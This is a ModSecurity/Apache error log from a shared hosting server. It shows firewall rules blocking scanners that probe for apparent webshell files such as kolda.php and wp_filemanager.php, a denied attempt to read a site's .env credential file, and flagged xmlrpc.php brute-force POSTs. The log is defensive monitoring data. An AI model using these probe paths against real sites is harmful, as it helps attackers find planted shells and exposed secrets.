[Tue May 26 16:35:36.688978 2026] [security2:error] [pid 808625:tid 808838] [client 130.131.224.225:64591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/kolda.php"] [unique_id "ahV-gDEl_SBaWibfDmpkEwAAAFM"]
[Tue May 26 16:35:36.689077 2026] [security2:error] [pid 808625:tid 808838] [client 130.131.224.225:64591] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/kolda.php"] [unique_id "ahV-gDEl_SBaWibfDmpkEwAAAFM"]
[Tue May 26 16:35:36.854191 2026] [security2:error] [pid 808625:tid 808812] [client 130.131.224.225:62663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/666.php"] [unique_id "ahV-gDEl_SBaWibfDmpkFwAAADk"]
[Tue May 26 16:35:36.854311 2026] [security2:error] [pid 808625:tid 808812] [client 130.131.224.225:62663] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/666.php"] [unique_id "ahV-gDEl_SBaWibfDmpkFwAAADk"]
[Tue May 26 16:35:37.087650 2026] [security2:error] [pid 808625:tid 808814] [client 130.131.224.225:64560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xoot.php"] [unique_id "ahV-gTEl_SBaWibfDmpkGwAAADs"]
[Tue May 26 16:35:37.087768 2026] [security2:error] [pid 808625:tid 808814] [client 130.131.224.225:64560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xoot.php"] [unique_id "ahV-gTEl_SBaWibfDmpkGwAAADs"]
[Tue May 26 16:35:37.366919 2026] [security2:error] [pid 808625:tid 808872] [client 130.131.224.225:65033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/vgtyu.php"] [unique_id "ahV-gTEl_SBaWibfDmpkIAAAAHU"]
[Tue May 26 16:35:37.367002 2026] [security2:error] [pid 808625:tid 808872] [client 130.131.224.225:65033] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/vgtyu.php"] [unique_id "ahV-gTEl_SBaWibfDmpkIAAAAHU"]
[Tue May 26 16:35:37.678425 2026] [security2:error] [pid 808625:tid 808880] [client 130.131.224.225:62598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/06.php"] [unique_id "ahV-gTEl_SBaWibfDmpkIQAAAH0"]
[Tue May 26 16:35:37.678531 2026] [security2:error] [pid 808625:tid 808880] [client 130.131.224.225:62598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/06.php"] [unique_id "ahV-gTEl_SBaWibfDmpkIQAAAH0"]
[Tue May 26 16:35:37.776108 2026] [security2:error] [pid 808625:tid 808766] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-gDEl_SBaWibfDmpkFgAAAAs"]
[Tue May 26 16:35:37.928113 2026] [security2:error] [pid 808625:tid 808793] [client 130.131.224.225:63261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/erty.php"] [unique_id "ahV-gTEl_SBaWibfDmpkKAAAACY"]
[Tue May 26 16:35:37.928216 2026] [security2:error] [pid 808625:tid 808793] [client 130.131.224.225:63261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/erty.php"] [unique_id "ahV-gTEl_SBaWibfDmpkKAAAACY"]
[Tue May 26 16:35:38.091384 2026] [security2:error] [pid 808625:tid 808847] [client 130.131.224.225:63970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahV-gjEl_SBaWibfDmpkKQAAAFw"]
[Tue May 26 16:35:38.091496 2026] [security2:error] [pid 808625:tid 808847] [client 130.131.224.225:63970] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahV-gjEl_SBaWibfDmpkKQAAAFw"]
[Tue May 26 16:35:38.232106 2026] [authz_core:error] [pid 808625:tid 808773] [client 176.65.139.231:52462] AH01630: client denied by server configuration: /home2/azurm42s/communedediende.azurmediatec.com/.env
[Tue May 26 16:35:38.576965 2026] [security2:error] [pid 808625:tid 808828] [client 130.131.224.225:63915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/66.php"] [unique_id "ahV-gjEl_SBaWibfDmpkNAAAAEk"]
[Tue May 26 16:35:38.577110 2026] [security2:error] [pid 808625:tid 808828] [client 130.131.224.225:63915] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/66.php"] [unique_id "ahV-gjEl_SBaWibfDmpkNAAAAEk"]
[Tue May 26 16:35:38.757788 2026] [security2:error] [pid 808625:tid 808801] [client 130.131.224.225:63260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/grsiuk.php"] [unique_id "ahV-gjEl_SBaWibfDmpkPwAAAC4"]
[Tue May 26 16:35:38.757889 2026] [security2:error] [pid 808625:tid 808801] [client 130.131.224.225:63260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/grsiuk.php"] [unique_id "ahV-gjEl_SBaWibfDmpkPwAAAC4"]
[Tue May 26 16:35:39.075032 2026] [security2:error] [pid 808625:tid 808860] [client 130.131.224.225:63359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/new4.php"] [unique_id "ahV-gzEl_SBaWibfDmpkSQAAAGk"]
[Tue May 26 16:35:39.075140 2026] [security2:error] [pid 808625:tid 808860] [client 130.131.224.225:63359] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/new4.php"] [unique_id "ahV-gzEl_SBaWibfDmpkSQAAAGk"]
[Tue May 26 16:35:39.214050 2026] [security2:error] [pid 808625:tid 808780] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-gjEl_SBaWibfDmpkOwAAABk"]
[Tue May 26 16:35:39.408981 2026] [security2:error] [pid 808625:tid 808799] [client 130.131.224.225:60100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/pouhg.php"] [unique_id "ahV-gzEl_SBaWibfDmpkTgAAACw"]
[Tue May 26 16:35:39.409114 2026] [security2:error] [pid 808625:tid 808799] [client 130.131.224.225:60100] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/pouhg.php"] [unique_id "ahV-gzEl_SBaWibfDmpkTgAAACw"]
[Tue May 26 16:35:39.641242 2026] [security2:error] [pid 808625:tid 808858] [client 130.131.224.225:62642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xa.php"] [unique_id "ahV-gzEl_SBaWibfDmpkUgAAAGc"]
[Tue May 26 16:35:39.641367 2026] [security2:error] [pid 808625:tid 808858] [client 130.131.224.225:62642] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xa.php"] [unique_id "ahV-gzEl_SBaWibfDmpkUgAAAGc"]
[Tue May 26 16:35:39.764047 2026] [security2:error] [pid 808625:tid 808770] [client 185.191.171.10:40764] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahV-gzEl_SBaWibfDmpkVQAAAA8"]
[Tue May 26 16:35:39.764224 2026] [security2:error] [pid 808625:tid 808770] [client 185.191.171.10:40764] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahV-gzEl_SBaWibfDmpkVQAAAA8"]
[Tue May 26 16:35:39.812826 2026] [security2:error] [pid 808625:tid 808868] [client 130.131.224.225:62692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ms.php"] [unique_id "ahV-gzEl_SBaWibfDmpkVgAAAHE"]
[Tue May 26 16:35:39.812932 2026] [security2:error] [pid 808625:tid 808868] [client 130.131.224.225:62692] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ms.php"] [unique_id "ahV-gzEl_SBaWibfDmpkVgAAAHE"]
[Tue May 26 16:35:40.797635 2026] [security2:error] [pid 808625:tid 808875] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-hDEl_SBaWibfDmpkYgAAAHg"]
[Tue May 26 16:35:41.745919 2026] [security2:error] [pid 808625:tid 808810] [client 114.119.157.183:52405] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/cold-and-flu-medicine.html"] [unique_id "ahV-hTEl_SBaWibfDmpkigAAADc"], referer: https://whitesun.in/1hfq/cold-and-flu-medicine.html
[Tue May 26 16:35:42.887571 2026] [security2:error] [pid 808625:tid 808857] [client 74.7.230.5:38290] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahV-hjEl_SBaWibfDmpkoAAAZnw"]
[Tue May 26 16:35:43.292726 2026] [security2:error] [pid 808625:tid 808830] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-hjEl_SBaWibfDmpknwAAAEs"]
[Tue May 26 16:35:45.030801 2026] [security2:error] [pid 808625:tid 808849] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-iDEl_SBaWibfDmpkvgAAAF4"]
[Tue May 26 16:35:46.190475 2026] [security2:error] [pid 808625:tid 808843] [client 117.198.37.168:59496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-ijEl_SBaWibfDmpk4wAAAFg"]
[Tue May 26 16:35:46.190600 2026] [security2:error] [pid 808625:tid 808843] [client 117.198.37.168:59496] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-ijEl_SBaWibfDmpk4wAAAFg"]
[Tue May 26 16:35:47.203844 2026] [security2:error] [pid 808625:tid 808857] [client 180.74.217.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV-iTEl_SBaWibfDmpk0gAAAGY"]
[Tue May 26 16:35:47.576521 2026] [security2:error] [pid 808625:tid 808755] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ijEl_SBaWibfDmpk8gAAAAA"]
[Tue May 26 16:35:48.954181 2026] [security2:error] [pid 808625:tid 808791] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-jDEl_SBaWibfDmplFAAAACQ"]
[Tue May 26 16:35:49.009954 2026] [security2:error] [pid 808625:tid 808860] [client 172.224.240.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV-jDEl_SBaWibfDmplHQAAAGk"]
[Tue May 26 16:35:49.970042 2026] [security2:error] [pid 808625:tid 808833] [client 45.205.1.28:62779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahV-jTEl_SBaWibfDmplMQAAAE4"]
[Tue May 26 16:35:51.193547 2026] [security2:error] [pid 808625:tid 808878] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-jjEl_SBaWibfDmplQgAAAHs"]
[Tue May 26 16:35:51.956801 2026] [security2:error] [pid 808625:tid 808813] [client 45.205.1.28:53057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "wrapmachines.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahV-jzEl_SBaWibfDmplWgAAADo"]
[Tue May 26 16:35:52.569891 2026] [security2:error] [pid 808625:tid 808837] [client 103.240.207.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-jzEl_SBaWibfDmplXQAAAFI"]
[Tue May 26 16:35:53.356712 2026] [security2:error] [pid 808625:tid 808756] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-kDEl_SBaWibfDmplcgAAAAE"]
[Tue May 26 16:35:55.410459 2026] [security2:error] [pid 808625:tid 808812] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-kjEl_SBaWibfDmplmQAAADk"]
[Tue May 26 16:35:56.346883 2026] [security2:error] [pid 808625:tid 808869] [client 114.119.155.224:46417] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahV-lDEl_SBaWibfDmpltwAAAHI"], referer: http://newdental.com.co/?ucci/5961792349791349l12a/cacdfg6274c.orthocephaly
[Tue May 26 16:35:56.774111 2026] [security2:error] [pid 808625:tid 808822] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-lDEl_SBaWibfDmplugAAAEM"]
[Tue May 26 16:35:56.811486 2026] [security2:error] [pid 808625:tid 808834] [client 117.198.37.168:59800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-lDEl_SBaWibfDmplxQAAAE8"]
[Tue May 26 16:35:56.811602 2026] [security2:error] [pid 808625:tid 808834] [client 117.198.37.168:59800] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-lDEl_SBaWibfDmplxQAAAE8"]
[Tue May 26 16:35:58.914827 2026] [security2:error] [pid 808625:tid 808779] [client 89.221.204.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-ljEl_SBaWibfDmpl9gAAABg"], referer: https://www.anujtradingco.com/
[Tue May 26 16:35:59.499985 2026] [security2:error] [pid 808625:tid 808797] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ljEl_SBaWibfDmpl-wAAACo"]
[Tue May 26 16:35:59.984812 2026] [security2:error] [pid 808625:tid 808782] [client 89.221.204.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-lzEl_SBaWibfDmpmEAAAABs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 16:36:00.532980 2026] [security2:error] [pid 808625:tid 808839] [client 4.204.220.190:38409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV-mDEl_SBaWibfDmpmGQAAAFQ"]
[Tue May 26 16:36:00.533125 2026] [security2:error] [pid 808625:tid 808839] [client 4.204.220.190:38409] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV-mDEl_SBaWibfDmpmGQAAAFQ"]
[Tue May 26 16:36:01.500438 2026] [security2:error] [pid 808625:tid 808818] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-mDEl_SBaWibfDmpmJgAAAD8"]
[Tue May 26 16:36:01.526753 2026] [autoindex:error] [pid 808625:tid 808874] [client 45.156.129.96:56196] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:36:04.089144 2026] [security2:error] [pid 808625:tid 808819] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-mjEl_SBaWibfDmpmcQAAAEA"]
[Tue May 26 16:36:05.157656 2026] [security2:error] [pid 808625:tid 808761] [client 4.204.220.190:26926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV-nTEl_SBaWibfDmpmoQAAAAY"]
[Tue May 26 16:36:05.157743 2026] [security2:error] [pid 808625:tid 808761] [client 4.204.220.190:26926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "vibrantforex.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV-nTEl_SBaWibfDmpmoQAAAAY"]
[Tue May 26 16:36:05.640487 2026] [security2:error] [pid 808625:tid 808768] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-nDEl_SBaWibfDmpmlwAAAA0"]
